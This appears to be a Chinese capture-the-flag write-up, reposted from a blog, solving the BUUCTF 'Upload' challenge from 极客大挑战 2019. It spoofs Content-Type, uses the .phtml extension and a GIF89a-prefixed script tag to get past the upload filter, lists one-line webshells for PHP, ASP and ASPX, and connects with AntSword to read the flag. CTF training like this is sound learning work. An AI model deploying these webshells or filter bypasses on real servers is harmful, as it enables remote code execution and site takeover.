其他分享
首页 > 其他分享> > 第十六题——[极客大挑战 2019]Upload

第十六题——[极客大挑战 2019]Upload

作者:互联网

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,提示上传图片文件

在这里插入图片描述

第二步:从本地上传图片,查看检测方式

从本地上传一张照片,使用burpsuit抓包,看到Content-Type一栏标注了格式为 image/png
在这里插入图片描述

第三步:准备一句话木马进行上传

  1. 一句话木马种类:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
  1. 将php的写入1.php文件里上传,使用burpsuit抓包后将Content-Type一栏进行修改,发现对php文件后缀名进行了拦截
  2. 可以将php改写为php3,php4,php5,phtml,pht绕过后缀名检测,经检验phtml可以绕过检测
  3. 将后缀名修改为phtml后再次上传发现对文本内的<?进行了拦截,讲一句话木马修改为:
    GIF89a? <script language="php">eval($_REQUEST[pass])</script>再次进行上传发现上传成功
    在这里插入图片描述

第四步:使用蚁剑进行连接

  1. 蚁剑添加URL为:http://e907786a-643a-4ec2-aa30-b72b4cedd782.node3.buuoj.cn/upload/1.phtml
  2. 右键点出虚拟终端,使用命令cat /flag查看flag
    在这里插入图片描述
    在这里插入图片描述

标签:phtml,极客,一句,Upload,后缀名,2019,木马,php,上传
来源: https://blog.csdn.net/qq_37589805/article/details/115573633